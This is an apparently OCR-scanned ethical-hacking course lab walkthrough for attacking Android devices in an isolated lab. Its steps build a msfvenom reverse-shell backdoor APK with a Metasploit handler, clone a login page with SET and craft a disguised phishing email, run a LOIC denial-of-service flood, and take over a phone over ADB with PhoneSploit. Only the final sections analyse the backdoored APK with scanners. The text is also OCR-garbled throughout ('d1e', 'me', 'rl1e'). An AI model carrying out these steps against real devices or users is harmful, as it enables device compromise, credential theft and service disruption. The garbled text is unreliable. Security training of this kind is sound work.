Hack an Android Device by Creating Binary Payloads using Parrot Security

In parrot Click the MATE Terminal icon at the top of the Desktop window to open a Terminal window
In the Parrot Terminal window, type service postgresql start and press Enter to start the database service
Type msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=10.10.10.13 R > Desktop/Backdoor.apk and press Enter to generate a backdoor, 
or reverse meterpreter application.
Note: This command creates an APK (Backdoor.apk) on Desktop under the Root directory. In this case, 10.10.10.13 is the IP address of the Parrot Security virtual machine. 
This IP address may differ in your lab environment
Now, share or send the Backdoor.apk file to the victim machine (in this lab, we are using the Android emulator as the victim machine).
Note: In this task, we are sending d1e malicious payload through a shared directory, but in real-life cases, attackers may send it via an attachment in an
email, over Bluetooh, or through some other application or means.
Type cp /root/Desktop/Backdoor.apk /var/www/html/share/ and press Enter to copy the file to the share folder.
Note: If the shared folder is not present, navigate to /var/www/html and create a folder named share.
 Now, type service apache2 start and press Enter to start the Apache web server.
 Type msfconsole and press Enter to launch the Metasploit framework.
In msfconsole, type use exploit/multi/handler and press Enter.
Now, issue the following commands in msfconsole:•
Type set payload android/meterpreter/reverse_tcp and press Enter.
Type set LHOST 10.10.10.13 and press Enter .
Type show options and press Enter. This command lets you know the listening port (in this case, 4444),
Type exploit -j -z and press Enter. This command runs the exploit as a backgrotmd job.
Switch to the Android emulator virtual machine.
In the Android Emulator GUI, click the Chrome icon on the lower section of the Home Screen to launch d1e browser.
In the address bar, type http://10.10.10.13/share and press Enter.
Note: If a pop up appears, click Allow.
The lndex of /share page appears; click Backdoor.apk to download the application package file.
After the download finishes, a notification appears at the bottom of the browser window. Click Open to open the application.
A MainActivity screen appears; click Next, and then lnstall.
A Blocked by Play Protect pop-up appears; click INSTALL ANYWAY
A Send app for scanning? pop-up appears; click DON'T SENO.
After the application installs successfully, an App installed notification appears; click OPEN.
Switch back to the Parrot Security virtual machine. The meterpreter session has been opened successfully, as shown in the screenshot.
Note: In this case, 10.10.10.14 is the IP address of the victim machine (Android Emulator) . The IP addresses may vary in your lab environment.
Type sessions -i 1 and press Enter. The Meterpreter shell is launched as shown in the screenshot.
Note: In this command, 1 specifies the number of the session.
Type sysinfo and press Enter. Issuing this command displays the information the target machine such as computer name, OS, etc.
Type ipconfig and press Enter to display the victim machine's network interfaces, IP address (IPv4 and 1Pv6), MAC address, etc. 
Type pwd and press Enter to view the current or present working directory on the remote (target) machine
Type cd /sdcard to change the current remote directory to sdcard.
Note: The cd command changes the current remote directory.
Now, type pwd and press Enter. You will observe that the present working directory has changed to sdcard, that is, /storage/emulated/0.
Now, still in the Meterpreter session, type ps and press Enter to view the processes running in the target system.
Note: The list of running processes might differ in your lab environment

Harvest Users' Credentials using the Social-Engineer Toolkit

Log in to the Parrot Security virtual macrune.
Click Applications in the top-left corner of Desktop and navigate to Pentesting -> Exploitation Tools -> Social Engineeñng -> social engineering toolkit.
Type y and press Enter to agree to the terms of services.
The SET menu appears, as shown in the screenshot. Type 1 and press Enter to choose Sociai-Engineering Attacks.
A list of options for Social-Engineering Attacks appears; type 2 and press Enter to choose Website Attack Vectors.A list of Website Attack Vector options appears; 
type 3 and press Enter to choose Credential Harvester Attack Method
Now, we need to create a clone of the Facebook login page. Type 2 and press Enter to choose Site Cloner from the menu.
Type the IP address of the local machine (Parrot Security) in the prompt for "IP address for the POST back in Harvester/Tabnabbing" and press Enter.
Note: The IP address of Parrot Security in this case is 10.10.10.13, but this may vary in your lab environment.
11. Now, you will be prompted for a URL to be cloned; type the desired URL in "Enter the url to clone" and press Enter. In this example, we are cloning the URL
http://certifiedhacker.com/Online%20Booking/index.htm.
Note: You can clone any URL of your choice.
If a Press {return} if you understand what we're saying here message appears, press Enter.
Note: If a message appears asking Do you want to attempt to disable Apache?, type y and press Enter
After cloning is completed, the highlighted message appears and he credencial harvester initiates, 
Now, you must send the IP address of your Parrot Security virtual machine to a victim and trick them to click on it. Minimize the Terminal window.
Remaining on your Parrot Security virtual machine, click on the Firefox icon in the top section of Desktop to launch the Firefox web browser.
In the Firefox browser window, open your email account (in this example, Gmail) and log in.
Note: You can use any email account of your choice.
17. After logging into your email account, click the Compose button and craft a fake email that will lure a user into opening and clicking on a malicious link.
Note: we will disguise the malicious link behind a fake link that looks safe to click.
18. Having written an enticing message in the body of the email, move the cursor to wheres u wish to place the malicious link. Then, click the lnsert link icon.
In the Edit Link window, first type the actual address of your cloned site in the web address field under the Link to section in the Web address field, type the actual 
(malicious) IP address. Then, type the fake URL in the Text to display field. In this case, the actual address of our cloned certifedhacker si te is http://10.10.10.13, 
and the text that will be  displayed in the message is http://www.bookhotel.com/change_account_password; click OK.
The fake URL should now appear in the message body
To verify that the fake URL is linked to the real one, click the fake URL; it will display d1e actual URL as " Go to link.'' Once verified, send the
email to the intended user
Switch to the Android virtual machine.
Note: Restart the Android virtual machine if it is not responding.
Click the Google Chrome icon Chrome on the Home screen to launch
 In the Google Chrome browser window, sign in to the account to which you sent the phishing mail as an attacker. Open the email you sent
previously and click to open the malicious link.
N ote: We are opening the phishing mail as a victim
When the victim (in this case, you) clicks the URL, a new tab opens up, and a replica of www.certifiedhacker.com loads.
The hotel booking page appears, scroll-down to the end of the page. 
Here, the victim will be prompted to enter his/her username and password into the form fields, which appear as they do on the genuine website. 
When the victim enters the Username and Password and clicks Login, the page shows an error, as shown in the second screenshot
As soon as the victim types in their Username and Password and clicks Log In, SET, which is runing in Parrot Security, fetches the typed
credentials, which can then be used by the attacker to gain unauthorized access to the victim's account.
Switch to the Parrot Security virtual machine. In the terminal window, scroll down to find a Username and Password, displayed in plain text..


Launch a DoS Attack on a Target Machine using Low Orbital Cannon (LOIC) on the Android Mobile Platform

Switch to the Android virtual machine. On the Home screen, swipe from right to left to navigate to the second page of the Home screen
On the second page of the Home screen, click the Cx File Explorer app
Cx File Explorer opens; click 10.10.10.10 from the Network tab and navigate to CEH-Tools -> CEHv11 Module 17 Hacking Mobile Platforms -> 
Android Hacking Tools -> Low Orbit Ion Cannon (LOIC).
Click the Low Orbit Ion Cannon LOIC_v1.3.apk file
A Do you want to install this application? screen appears, click INSTALL
The installation begins; on completion, an App installed notification appears; click OPEN to launch the app
On the LOIC screen, we will seta target website or machine. In this task,
we shall launch a DoS attack on Windows Server 2019 (10.10.10.19) machine.
In the left pane, in the URL field, type 10.10.10.19 and click the GET IP button.
The IP address of the target machine is displayed under the Manual IP option
To launch d1e attack, first select d1e TCP radio button; in the right pane, enter 80 as the Port number and in the Threads field, enter 100. Then,
click the Start button
LOIC begins to flood the target machine with TCP packets, which we will see by running Wireshark Switch to the Windows Server 2019 virtual machine and login with the
credentials Administrator/ Pa$$w0rd.
14. Click d1e Type here to search field at d1e bottom of Desktop and type wireshark. Then, click Wireshark from the results.
Note: If Wireshark is not installed in d1e Windows Server 2019 virtual machine, then navigate to the location 
Z:\CEHv11 Module 03 Scanning Networks\Banner Grabbing Tools\Wireshark and double-click Wiresharkwin64-3.0.5.exe file and install Wireshark using default settings.
15. The Wireshark Network Analyzer opens; double-click on the primary network interface (in this case, EthemetO) to start capturing network traffic
Switch to the Windows Server 2019 virtual machine and login with the
credentials Administrator/ Pa$$w0rd.
Wireshark starts capturing network packets. Note the huge number of packets coming from the attackers' maclúne (in dús case, Android, which
has the IP address 10.10.10.14), as shown in the screenshot.
17. The packets from 10.10.10.14 are sent to d1e target maclúne (Windows Server 2019), whose IP address is 10.10.10.19.
Now, click the Stop capturing packets icon the process. in the toolbar to stop
19. Observe the huge number of packets sent tn the Packets field at the bottom of the Wireshark window
Now switch back to the Android virtual machine and halt the DoS attack by clicking the STOP button


Exploit the Android Platform through ADB using PhoneSploit
In Parrot in a terminal, type cd and press Enter to jump to the root directory
In the Terminal window, type apt-get install adb and press Enter to install ADB.
If a Do you want to continue? message appears during the installation, type Y and press Enter to continue.
Once the installation completes, type git clone https://github.com/01010000-kumar/PhoneSploit and press Enter to clone the PhoneSploit repository
Open a windows explorer and press Ctrl+L. The Location field appears;
type smb://10.10.10.10 and press Enter to access Windows 10 shared folders.
The security pop-up appears; enter the Windows 10 virtual machine credentials (Usemame: Admin and Password: Pa$$w0rd) and click Connect.
The Windows shares on 10.10.10.10 window appears; navigate to the location CEH-Tools/CEHv11 Module 17 Hacking Mobile Platfonns/GitHub Tools/ and copy the PhoneSploit folder.
Paste the copied PhoneSploit folder on the location /home/attacker/.
In the terminal window, type mv /home/attacker/PhoneSploit /root/ .
10. Now, type cd PhoneSploit and press Enter to navigate to the PhoneSploit folder.
Note: By default, the tool will be cloned in the root directoty 
Type phyton3 -m pip install colorama and press Enter to install the dependency
Now, type python3 phonesploit.py and press Enter to run the tool.
The PhoneSploit main menu options appear
The main_menu prompt appears; type 3 and press Enter to choose Connect a newphone
When prompted to Enter a phones ip address, type the target Android device's IP address (in this case, 10.10.10.14) and press Enter.
16. You will see that the target Android device (in this case, 10.10.10.14) is connected through port number 5555
Note: If you are unable to establish a connection with the target device, then perform Steps#12-15 again.
Now, at me main_menu prompt, type 4 and press Enter to choose Access Shell on a phone.
18. When prompted to Entera device name, type d1e target Android device's IP address (in this case, 10.10.1 0.14) and press Enter.
19. You can observe that a shell command line appears
In the shell command line, type pwd and press Enter to view the present working directory on the target Android device.
21. In the results, you can observe that the PWD is d1e root directory.
22. Now, type ls and press Enter to view all the files present in the root directory.
Type cd sdcard and press Enter to navigate to the sdcard folder.
24. Type ls and press Enter to list all the available files and folders.
Note: In this example, we will download an image file (images.jpeg) that we placed in d1e Android virtual machine's Download folder earlier; you can do the
same before performing the next steps
Type cd Download and press Enter to navigate to the Download folder.
26. Type ls and press Enter to list al! the available files in the folder. In this case, we are interested in the images.jpeg file, which we downloaded earlier.
Note: Note down the location of images.jpeg (in this example, /sdcard/Downloadlimages.jpeg). We will download this file in later steps
Type exit and press Enter to exit the shell command line and rerurn to the main_menu.
28. At the main_menu prompt, type 7 and press Enter to choose Screen Shot a picture on a phone.
29. When prompted to Entera device name, type d1e target Android device's IP address (m this case, 10.10.10.14) and press Enter.
30. When prompted to Enter where you would like the screenshot to be saved, type /home/attacker/Desktop/ as the location and press Enter. The
screenshot of the target mobile device will be saved in the given location. Minimize the Terminal window
Click Places in the top section of me Desktop; then, from me context menu, click Desktop.
32. You should see me downloaded screenshot of rl1e targeted Android device (screen.png). Double-click it if you wish to view me screenshot
Close me Desktop window and switch back to me Terminal window.
34. At me main_menu prompt, type 14 and press Enter to choose List all apps on a phone.
35. When prompted to Enter a device name, type the target Android device's IP address (in this case, 10.10.10.14) and press Enter.
36. the result appears, displaying the installed apps on me target Android device, 
Note: using this information, you can use other PhoneSploit options to either launch or install any of me installed apps.
Now, at the main_menu prompt, type 15 and press Enter to choose Run an app. In this example, we will launch a calculator app on the target Android device.
Note: Based 011 rl1e information obtained in the previous step about the installed applications, you can launch any app of your choice.
38. When prompted to Enter a device name, type the target Android device's IP address (in this case, 10.10.10.14) and press Enter.
39. To launch the calculator app, type com.android.calculator2 and press Enter.
After launching the calculator app on the target Android device, switch to the Android virtual machine.
41. You will see that the calculator app is running, and that random values have been entered, 
N ote: The entered values núght differ in your lab environment
Switch back to the Parrot Security virtual machine. In the Terminal window, type p and press Enter to navigate to additional PhoneSploit options on the Next Page.
43. The result appears, displaying additional PhoneSploit options, as shown in the screenshot.
44. At the main_menu prompt, type 18 and press Enter to choose Show Mac/lnet information for the target Android device.
When prompted to Enter a device name, type rl1e target Android device's IP address (in this case, 10.10.10.14) and press Enter
Now, at the main_menu prompt, type 21 and press Enter to choose the NetStat option.
47. When prompted to Entera device name, type the target Android device's IP address (in this case, 10.10.10.14) and press Enter.
48. The result appears, displaying netstat infonnation of the target Android device, Note: For demonstration purposes, in this task, we are exploiting the Android
emulator virtual machine. However, in real life, attackers use the Shodan search engine to find ADB-enabled devices and exploit them to gain senstive
information and carry out malicious activities.
49. In the same way, you can exploit the target Android device further by choosing other PhoneSploit options such as lnstall an apk on a phone,
Screen record a phone, Turn The Device off, and Uninstall an app

Sixo
Turn on the Android virtual machine and click the Google Chrome browser icon on the Home screen to launch Chrome.
2. In Chrome, type https://www.sisik.eu/apk-tool in the address bar and press Enter.
The Sixo Online APK Analyzer webpage loads
Note: If a cookie notification pop-up appears, click Got it!
4. Click the Drop APK here or click to select file field to upload an APK file from the device.
Note: Sixo Online APK Analyzer allows you to analyze various details about Android APK files. lt can decompile binary XML files and resources.
In the Choose an action pop-up, click Files
The Downloads screen appears; double-click the app_backdoored.apk file.
Note: If you find yourself in a folder called Recent navigate to the Downloads folder by clicking on the hamburger icon the top-left corner.
The browser window reappears with the information about the uploaded file (Backdoored.apk)
Scroll down to the Requested Permissions section to view information regarding the app's requested permissions.
Note: When an app wants to access resources or various device capabilities, it typically must request permission from the user todo so. Some permissions
are granted by the user when installing the app and some need to be confinned later while the app is running. The requested
declared in the app's Androidl\Manifest.xml file.
Scroll down to the AndroidManifest.xml section, which consists of essential infonnation about d1e APK file.
Note: The manifest file contains important information about the app that is used by development tools, d1e Android system, and app stores. lt contains
the app's package name, version information, declarations of app components, requested permissions, and oilier important data. lt is serialized
into a binary XML format and bundled inside the app's APK file.
You can also scroll clown to view infonnation about the app's APK Signature, App Source Code, etc

AVC UnDroid

Press Ctrl+T to open a new tab, type https://undroid-avcomparatives.org/ in the address bar, and press Enter.
13. The AVC UnDroid website loads; click Select APK ....
In the Choose an action pop-up, click Files.
15. In the Downloads screen, double-click app_backdoored.apk.
16. The selected ftle (app_backdoored.apk) is now listed; click Start analysis button to analyze the selected APK file
Note: A VC UnDroid is an online Android analyzer that provides analysis of Android apps
AVC UnDroid initializes the analysis of d1e selected APK file. On completion, the Report appears, displaying detailed information about the APK file, 
18. The Report section displays information such as MDS, SHA 1, SHA256, ftle size, ftlename, etc.
Scroll down to view information regarding Requested Permissions, Responsible API calls for used Permissions, Potentially dangerous Calls, and more.

Quixxi Vulnerability Scanner

In Chrome, type https://vulnerabilitytest.quixxi.com/#1 in the address bar and press Enter.
4. The Quixxi website loads; click the Drag'n'drop or click here to scan your app field.
When the Choose an action pop-up appears, click Files
The Downloads screen appears; double-click Backdoor.apk.
7. Quick starts scanning the selected APK file (Backdoor.apk) for vulnerabilities
After the sean fmishes, Vulnerability Sean Report: A Summary appears displaying the application name, vulnerabilities scanned, high severity threats, etc., 
Click to expand Permissions Used node to view the pennissions.
Scroll-down, click to expand CERTIFICATION INFORMATION node to view certification details
Scroll-down further to view the OWASP infonnation such as lssue, Severity, Assessment Status, CWE, Exploits, etc.
You can scroll-down and click on GET FULL REPORT button to generate a full report.

